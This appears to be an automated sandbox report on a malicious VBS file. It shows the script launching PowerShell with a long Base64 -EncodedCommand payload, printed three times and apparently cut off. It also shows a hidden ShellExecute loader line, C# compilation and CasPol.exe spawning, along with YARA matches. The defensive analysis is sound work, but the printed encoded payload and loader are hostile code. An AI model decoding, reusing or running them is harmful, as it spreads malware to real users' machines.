Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoExit -EncodedCommand "JABNAGkAbABqAHYAcgBuAGUAdABsACAAPQAgAEAAJwANAAoASQBtACQASABhAHUAUwB0AHYAQQBzAG8ARwByAHIARgBpADkAVABpACAAQgBpAD0AYQBmACAAQQBmACIAQQBmAFYARABpAGkAUgBlAHIAUwBwAHQAQQBmAHUATABvAGEAUgBlAGwASwBhAEEAUAB0AGwAQQBnAGwAUgBlAG8AUgBlAGMAUABoACIACgBTAHQAQQBLAG8AZABDAGgAZABMAHUALQBCAG8AVABJAGQAeQBsAGUAcABSAGkAZQBBAG4AIABlAHEALQBTAGsAVABOAGUAeQBVAG4AcABFAHMAZQBTAHQARABDAGEAZQBPAHAAZgBWAGUAaQBQAG8AbgBEAGUAaQBJAGQAdABTAHQAaQBBAHQAbwBOAG8AbgBLAGUAIABDAGgAQABWAGUAIgAKAHUAZAB1AEYAbwBzAFIAZQBpAEEAawBuAGEAZgBnAEEAcwAgAEwAZQBTAE8AcAB5AEMAeQBzAFMAZQB0AEQAaQBlAEEAbgBtAFAAcgA7AAoAdABpAHUARgBhAHMAQQBwAGkASQBuAG4AbwBwAGcASQBuACAAQgBhAFMATwBwAHkAQQBrAHMAVQBuAHQAVgBpAGUATQBlAG0AVgBlAC4AdgBlAFIAbwB2AHUAQwBvAG4AZQB4AHQAVABhAGkARABpAG0ATABhAGUAUwB0AC4AVgBlAEkAQgBpAG4ASwBvAHQARwBvAGUAQwBpAHIAQQBuAG8ARgBsAHAAWQBvAFMAVABoAGUAVQBuAHIAZQBpAHYAVQBkAGkARwBzAGMAUwBoAGUAUgBvAHMAUABsADsACgBPAHAAcABTAHkAdQBSAGEAYgBGAGEAbABNAGEAaQBXAGkAYwB1AG4AIABBAHUAcwBJAG4AdABQAG8AYQBVAHAAdABTAGEAaQBHAHIAYwBEAG8AIABzAGsAYwByAGkAbABNAGkAYQBXAG8AcwBGAHIAcwBpAG4AIABTAHQAQwBHAGkAbABWAG8AYQBTAHUAZABJAG4AbwBNAHkAZwBHAHQAZQBTAHQAbgBBAHIAZQBGAGEAdABMAG8AMQAKAFMAcAB7AEEAcwBbAEcAbgBEAGIAZQBsAFUAbgBsAEIAdQBJAEYAeQBtAEQAbwBwAEYAYQBvAFYAZQByAFQAcgB0AFUAbgAoAFAAaAAiAEsAZQB1AFUAaQBzAFMAdQBlAFAAcwByAEYAbgAzAEEAcAAyAHMAawAiAHQAcgApAEcAcgBdAEUAbgBwAFAAaQB1AE8AcABiAFMAdABsAHMAYQBpAFMAcABjAFYAaQAgAFMAdQBzAFAAbwB0AEgAYQBhAFMAawB0AEIAZQBpAFMAYwBjAFUAbgAgAEQAaQBlAEUAcgB4AFAAdQB0AFMAdgBlAEEAcgByAFcAYQBuAEkAbgAgAEcAZwBpAFAAZQBuAE0AYQB0AFUAbgAgAHQAcgBDAFAAaQByAEEAYQBlAEQAZQBhAFMAbAB0AFMAdABlAEsAbABNAEIAdQBEAFAAbABJAGkAbgBXAFUAbgBpAEUAbABuAHMAdABkAFIAZQBvAFYAYQB3AE0AYQAoAEwAYQBpAEEAbgBuAFMAawB0AFMAdAAgAEIAZQBOAEYAbAB2AFUAbgBoAEkAcgBpAEUAbQBlAEMAbwAsAEEAbgBpAEMAaABuAFAAcgB0AEQAaQAgAEYAbwBIAEwAYQBlAEsAbABhAEIAZQAsAGQAcgBpAFQAYQBuAEYAbwB0AEIAZQAgAFIAZQBoAFAAYQBhAEYAbwB0AGEAZgBjAEIAcgBoAFQAcgAsAEwAYQBpAEIAcgBuAEYAbwB0AFQAZQAgAFUAbgBQAFQAbwBpAEIAbwBuAE0AYQBpAEQAaQAsAE0AZQBpAE4AbwBuAEYAagB0AEMAaAAgAGQAdQBPAE0AYQB2AEgAZQBlAE8AcgByAFMAYQBpAFMAbAAsAEYAbwBpAE4AYQBuAHIAZQB0AE8AdgAgAFAAZQBSAHUAbgBlAEEAbgBjAE8AYgBpAE0AbwB0AEUAbABhAHAAYQAsAFIAZQBpAFMAYQBuAEMAYQB0AEgAYQAgAFAAcgBPAEcAbwBwAEEAdQBrAFMAbgByAE4AbwAsAEIAcgBpAG0AYQBuAEkAbgB0AEQAYQAgAEEAdQBDAFIAaQByAFAAcgBvAEgAYQBjAEgAZQBrAHMAawAsAGEAawBpAFIAdQBuAEgAeQB0AE0AZQAgAE0AYQBBAFAAaAB1AE4AYQB0AFkAbwBvAEEAcwBzAFMAZAAsAEcAdQBpAEEAZgBuAEEAcAB0AFMAawAgAFUAbgBSAFAAbABlAEEAZgB0AFMAawByAFcAcgApAE8AcAA7AAoARwBsAFsAVABhAEQAVABlAGwASABvAGwAQQBuAEkARABvAG0AUwBuAHAATgBvAG8AYQB1AHIAUwBrAHQATwBjACgARwBsACIATABpAHcASAB5AGkAUwBhAG4ATwBiAG0AYQBjAG0AQgBhAC4AUwBtAGQAcABoAGwATwBuAGwAUABhACIAYQBsACkARQB4AF0AQQByAHAATQBvAHUAUwBpAGIAQQBhAGwAVABlAGkARABpAGMAUgBpACAAUwB0AHMARABlAHQATQBlAGEAQwB1AHQAQgBlAGkAVABoAGMATABhACAAQwBvAGUARABhAHgARQByAHQAdABvAGUAVABhAHIAQQBtAG4AUgB1ACAAQQByAGkARwByAG4ARwByAHQATABvACAAaABlAEcATABlAGUAVABhAHQAQQBxAEQARQBrAHIATQB5AGkARABvAHYAagBvAGUASABvAHIATA
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoExit -EncodedCommand "JABNAGkAbABqAHYAcgBuAGUAdABsACAAPQAgAEAAJwANAAoASQBtACQASABhAHUAUwB0AHYAQQBzAG8ARwByAHIARgBpADkAVABpACAAQgBpAD0AYQBmACAAQQBmACIAQQBmAFYARABpAGkAUgBlAHIAUwBwAHQAQQBmAHUATABvAGEAUgBlAGwASwBhAEEAUAB0AGwAQQBnAGwAUgBlAG8AUgBlAGMAUABoACIACgBTAHQAQQBLAG8AZABDAGgAZABMAHUALQBCAG8AVABJAGQAeQBsAGUAcABSAGkAZQBBAG4AIABlAHEALQBTAGsAVABOAGUAeQBVAG4AcABFAHMAZQBTAHQARABDAGEAZQBPAHAAZgBWAGUAaQBQAG8AbgBEAGUAaQBJAGQAdABTAHQAaQBBAHQAbwBOAG8AbgBLAGUAIABDAGgAQABWAGUAIgAKAHUAZAB1AEYAbwBzAFIAZQBpAEEAawBuAGEAZgBnAEEAcwAgAEwAZQBTAE8AcAB5AEMAeQBzAFMAZQB0AEQAaQBlAEEAbgBtAFAAcgA7AAoAdABpAHUARgBhAHMAQQBwAGkASQBuAG4AbwBwAGcASQBuACAAQgBhAFMATwBwAHkAQQBrAHMAVQBuAHQAVgBpAGUATQBlAG0AVgBlAC4AdgBlAFIAbwB2AHUAQwBvAG4AZQB4AHQAVABhAGkARABpAG0ATABhAGUAUwB0AC4AVgBlAEkAQgBpAG4ASwBvAHQARwBvAGUAQwBpAHIAQQBuAG8ARgBsAHAAWQBvAFMAVABoAGUAVQBuAHIAZQBpAHYAVQBkAGkARwBzAGMAUwBoAGUAUgBvAHMAUABsADsACgBPAHAAcABTAHkAdQBSAGEAYgBGAGEAbABNAGEAaQBXAGkAYwB1AG4AIABBAHUAcwBJAG4AdABQAG8AYQBVAHAAdABTAGEAaQBHAHIAYwBEAG8AIABzAGsAYwByAGkAbABNAGkAYQBXAG8AcwBGAHIAcwBpAG4AIABTAHQAQwBHAGkAbABWAG8AYQBTAHUAZABJAG4AbwBNAHkAZwBHAHQAZQBTAHQAbgBBAHIAZQBGAGEAdABMAG8AMQAKAFMAcAB7AEEAcwBbAEcAbgBEAGIAZQBsAFUAbgBsAEIAdQBJAEYAeQBtAEQAbwBwAEYAYQBvAFYAZQByAFQAcgB0AFUAbgAoAFAAaAAiAEsAZQB1AFUAaQBzAFMAdQBlAFAAcwByAEYAbgAzAEEAcAAyAHMAawAiAHQAcgApAEcAcgBdAEUAbgBwAFAAaQB1AE8AcABiAFMAdABsAHMAYQBpAFMAcABjAFYAaQAgAFMAdQBzAFAAbwB0AEgAYQBhAFMAawB0AEIAZQBpAFMAYwBjAFUAbgAgAEQAaQBlAEUAcgB4AFAAdQB0AFMAdgBlAEEAcgByAFcAYQBuAEkAbgAgAEcAZwBpAFAAZQBuAE0AYQB0AFUAbgAgAHQAcgBDAFAAaQByAEEAYQBlAEQAZQBhAFMAbAB0AFMAdABlAEsAbABNAEIAdQBEAFAAbABJAGkAbgBXAFUAbgBpAEUAbABuAHMAdABkAFIAZQBvAFYAYQB3AE0AYQAoAEwAYQBpAEEAbgBuAFMAawB0AFMAdAAgAEIAZQBOAEYAbAB2AFUAbgBoAEkAcgBpAEUAbQBlAEMAbwAsAEEAbgBpAEMAaABuAFAAcgB0AEQAaQAgAEYAbwBIAEwAYQBlAEsAbABhAEIAZQAsAGQAcgBpAFQAYQBuAEYAbwB0AEIAZQAgAFIAZQBoAFAAYQBhAEYAbwB0AGEAZgBjAEIAcgBoAFQAcgAsAEwAYQBpAEIAcgBuAEYAbwB0AFQAZQAgAFUAbgBQAFQAbwBpAEIAbwBuAE0AYQBpAEQAaQAsAE0AZQBpAE4AbwBuAEYAagB0AEMAaAAgAGQAdQBPAE0AYQB2AEgAZQBlAE8AcgByAFMAYQBpAFMAbAAsAEYAbwBpAE4AYQBuAHIAZQB0AE8AdgAgAFAAZQBSAHUAbgBlAEEAbgBjAE8AYgBpAE0AbwB0AEUAbABhAHAAYQAsAFIAZQBpAFMAYQBuAEMAYQB0AEgAYQAgAFAAcgBPAEcAbwBwAEEAdQBrAFMAbgByAE4AbwAsAEIAcgBpAG0AYQBuAEkAbgB0AEQAYQAgAEEAdQBDAFIAaQByAFAAcgBvAEgAYQBjAEgAZQBrAHMAawAsAGEAawBpAFIAdQBuAEgAeQB0AE0AZQAgAE0AYQBBAFAAaAB1AE4AYQB0AFkAbwBvAEEAcwBzAFMAZAAsAEcAdQBpAEEAZgBuAEEAcAB0AFMAawAgAFUAbgBSAFAAbABlAEEAZgB0AFMAawByAFcAcgApAE8AcAA7AAoARwBsAFsAVABhAEQAVABlAGwASABvAGwAQQBuAEkARABvAG0AUwBuAHAATgBvAG8AYQB1AHIAUwBrAHQATwBjACgARwBsACIATABpAHcASAB5AGkAUwBhAG4ATwBiAG0AYQBjAG0AQgBhAC4AUwBtAGQAcABoAGwATwBuAGwAUABhACIAYQBsACkARQB4AF0AQQByAHAATQBvAHUAUwBpAGIAQQBhAGwAVABlAGkARABpAGMAUgBpACAAUwB0AHMARABlAHQATQBlAGEAQwB1AHQAQgBlAGkAVABoAGMATABhACAAQwBvAGUARABhAHgARQByAHQAdABvAGUAVABhAHIAQQBtAG4AUgB1ACAAQQByAGkARwByAG4ARwByAHQATABvACAAaABlAEcATABlAGUAVABhAHQAQQBxAEQARQBrAHIATQB5AGkARABvAHYAagBvAGUASABvAHIATA

Potential malicious VBS script found (suspicious strings)

Source:

Initial file: Strygeorke.ShellExecute Flogste, "-NoExit -E" & Sammentr(110) & Sammentr(99) & "oded" & "Command " & chr(34) & Ambulating58 & chr(34), "", "", 0

Very long command line found

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 13732
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 13732

Source: 0000001A.00000000.1970106356.0000000001350000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, score = , reference = Internal Research
Source: 00000014.00000002.2220743788.0000000009E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, score = , reference = Internal Research
Source: 00000014.00000002.2103587544.0000000004C30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, score = , reference = Internal Research
Source: 00000014.00000002.2099293106.0000000003010000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, score = , reference = Internal Research
Source: 00000014.00000002.2096104717.0000000002EDA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, score = , reference = Internal Research
Source: 00000014.00000003.1512001892.0000000002F62000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, score = , reference = Internal Research
Source: 00000014.00000003.1609777781.00000000086AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, score = , reference = Internal Research
Source: 00000014.00000002.2094575687.0000000002E90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, score = , reference = Internal Research
Source: 00000014.00000002.2098442263.0000000002F6B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, score = , reference = Internal Research
Source: 00000014.00000002.2100345664.0000000003290000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, score = , reference = Internal Research
Source: 00000014.00000003.1523532169.0000000002F6B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, score = , reference = Internal Research
Source: 00000014.00000002.2105674011.0000000005081000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, score = , reference = Internal Research
Source: Process Memory Space: powershell.exe PID: 9092, type: MEMORYSTR	Matched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, score = , reference = Internal Research
Source: Process Memory Space: CasPol.exe PID: 6564, type: MEMORYSTR	Matched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, score = , reference = Internal Research

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_08506D00
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_0850E468
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_0850E458
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_088C53C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_088C2AC8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_088C2AD8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_088E91A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_088EB1A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_088EA960
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_088E6A60
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_088E73A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_088E9BC8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_088E64F8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_088E25E8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_088E5758
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_08950006
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_08950040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_089552B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_089552C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_08B6E940
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_08B6D6E8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_08C69118
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_08C6AA00
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_08D12C07
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_08D10F33
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_08D128C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 26_2_1DAD7020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 26_2_1DADA220
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 26_2_1DAD9950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 26_2_1DAD9608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 26_2_20B03405
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 26_2_20B0E6D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 26_2_20B05626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 26_2_20B0AE49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 26_2_20B094B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 26_2_20B0567F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 26_2_20B01E48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 26_2_20C2007B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 26_2_20C24AD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 26_2_20C2BE28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 26_2_20C2D390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 26_2_20C22F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 26_2_20C2BC3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 26_2_20C291E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 26_2_20C29588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 26_2_20C25280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 26_2_20C29E28

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: String function: 1DADD130 appears 54 times

Source: PUMP mt310143121.vbs

Initial sample: Strings found which are bigger than 50

Source: C:\Windows\System32\wscript.exe	Section loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: edgegdi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: edgegdi.dll

Source: PUMP mt310143121.vbs

Virustotal: Detection: 8%

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PUMP mt310143121.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoExit -EncodedCommand "JABNAGkAbABqAHYAcgBuAGUAdABsACAAPQAgAEAAJwANAAoASQBtACQASABhAHUAUwB0AHYAQQBzAG8ARwByAHIARgBpADkAVABpACAAQgBpAD0AYQBmACAAQQBmACIAQQBmAFYARABpAGkAUgBlAHIAUwBwAHQAQQBmAHUATABvAGEAUgBlAGwASwBhAEEAUAB0AGwAQQBnAGwAUgBlAG8AUgBlAGMAUABoACIACgBTAHQAQQBLAG8AZABDAGgAZABMAHUALQBCAG8AVABJAGQAeQBsAGUAcABSAGkAZQBBAG4AIABlAHEALQBTAGsAVABOAGUAeQBVAG4AcABFAHMAZQBTAHQARABDAGEAZQBPAHAAZgBWAGUAaQBQAG8AbgBEAGUAaQBJAGQAdABTAHQAaQBBAHQAbwBOAG8AbgBLAGUAIABDAGgAQABWAGUAIgAKAHUAZAB1AEYAbwBzAFIAZQBpAEEAawBuAGEAZgBnAEEAcwAgAEwAZQBTAE8AcAB5AEMAeQBzAFMAZQB0AEQAaQBlAEEAbgBtAFAAcgA7AAoAdABpAHUARgBhAHMAQQBwAGkASQBuAG4AbwBwAGcASQBuACAAQgBhAFMATwBwAHkAQQBrAHMAVQBuAHQAVgBpAGUATQBlAG0AVgBlAC4AdgBlAFIAbwB2AHUAQwBvAG4AZQB4AHQAVABhAGkARABpAG0ATABhAGUAUwB0AC4AVgBlAEkAQgBpAG4ASwBvAHQARwBvAGUAQwBpAHIAQQBuAG8ARgBsAHAAWQBvAFMAVABoAGUAVQBuAHIAZQBpAHYAVQBkAGkARwBzAGMAUwBoAGUAUgBvAHMAUABsADsACgBPAHAAcABTAHkAdQBSAGEAYgBGAGEAbABNAGEAaQBXAGkAYwB1AG4AIABBAHUAcwBJAG4AdABQAG8AYQBVAHAAdABTAGEAaQBHAHIAYwBEAG8AIABzAGsAYwByAGkAbABNAGkAYQBXAG8AcwBGAHIAcwBpAG4AIABTAHQAQwBHAGkAbABWAG8AYQBTAHUAZABJAG4AbwBNAHkAZwBHAHQAZQBTAHQAbgBBAHIAZQBGAGEAdABMAG8AMQAKAFMAcAB7AEEAcwBbAEcAbgBEAGIAZQBsAFUAbgBsAEIAdQBJAEYAeQBtAEQAbwBwAEYAYQBvAFYAZQByAFQAcgB0AFUAbgAoAFAAaAAiAEsAZQB1AFUAaQBzAFMAdQBlAFAAcwByAEYAbgAzAEEAcAAyAHMAawAiAHQAcgApAEcAcgBdAEUAbgBwAFAAaQB1AE8AcABiAFMAdABsAHMAYQBpAFMAcABjAFYAaQAgAFMAdQBzAFAAbwB0AEgAYQBhAFMAawB0AEIAZQBpAFMAYwBjAFUAbgAgAEQAaQBlAEUAcgB4AFAAdQB0AFMAdgBlAEEAcgByAFcAYQBuAEkAbgAgAEcAZwBpAFAAZQBuAE0AYQB0AFUAbgAgAHQAcgBDAFAAaQByAEEAYQBlAEQAZQBhAFMAbAB0AFMAdABlAEsAbABNAEIAdQBEAFAAbABJAGkAbgBXAFUAbgBpAEUAbABuAHMAdABkAFIAZQBvAFYAYQB3AE0AYQAoAEwAYQBpAEEAbgBuAFMAawB0AFMAdAAgAEIAZQBOAEYAbAB2AFUAbgBoAEkAcgBpAEUAbQBlAEMAbwAsAEEAbgBpAEMAaABuAFAAcgB0AEQAaQAgAEYAbwBIAEwAYQBlAEsAbABhAEIAZQAsAGQAcgBpAFQAYQBuAEYAbwB0AEIAZQAgAFIAZQBoAFAAYQBhAEYAbwB0AGEAZgBjAEIAcgBoAFQAcgAsAEwAYQBpAEIAcgBuAEYAbwB0AFQAZQAgAFUAbgBQAFQAbwBpAEIAbwBuAE0AYQBpAEQAaQAsAE0AZQBpAE4AbwBuAEYAagB0AEMAaAAgAGQAdQBPAE0AYQB2AEgAZQBlAE8AcgByAFMAYQBpAFMAbAAsAEYAbwBpAE4AYQBuAHIAZQB0AE8AdgAgAFAAZQBSAHUAbgBlAEEAbgBjAE8AYgBpAE0AbwB0AEUAbABhAHAAYQAsAFIAZQBpAFMAYQBuAEMAYQB0AEgAYQAgAFAAcgBPAEcAbwBwAEEAdQBrAFMAbgByAE4AbwAsAEIAcgBpAG0AYQBuAEkAbgB0AEQAYQAgAEEAdQBDAFIAaQByAFAAcgBvAEgAYQBjAEgAZQBrAHMAawAsAGEAawBpAFIAdQBuAEgAeQB0AE0AZQAgAE0AYQBBAFAAaAB1AE4AYQB0AFkAbwBvAEEAcwBzAFMAZAAsAEcAdQBpAEEAZgBuAEEAcAB0AFMAawAgAFUAbgBSAFAAbABlAEEAZgB0AFMAawByAFcAcgApAE8AcAA7AAoARwBsAFsAVABhAEQAVABlAGwASABvAGwAQQBuAEkARABvAG0AUwBuAHAATgBvAG8AYQB1AHIAUwBrAHQATwBjACgARwBsACIATABpAHcASAB5AGkAUwBhAG4ATwBiAG0AYQBjAG0AQgBhAC4AUwBtAGQAcABoAGwATwBuAGwAUABhACIAYQBsACkARQB4AF0AQQByAHAATQBvAHUAUwBpAGIAQQBhAGwAVABlAGkARABpAGMAUgBpACAAUwB0AHMARABlAHQATQBlAGEAQwB1AHQAQgBlAGkAVABoAGMATABhACAAQwBvAGUARABhAHgARQByAHQAdABvAGUAVABhAHIAQQBtAG4AUgB1ACAAQQByAGkARwByAG4ARwByAHQATABvACAAaABlAEcATABlAGUAVABhAHQAQQBxAEQARQBrAHIATQB5AGkARABvAHYAagBvAGUASABvAHIATA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sepi5xx1\sepi5xx1.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA2B2.tmp" "c:\Users\user\AppData\Local\Temp\sepi5xx1\CSC7F7A267C826A46D5AA3589EC91649B9.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
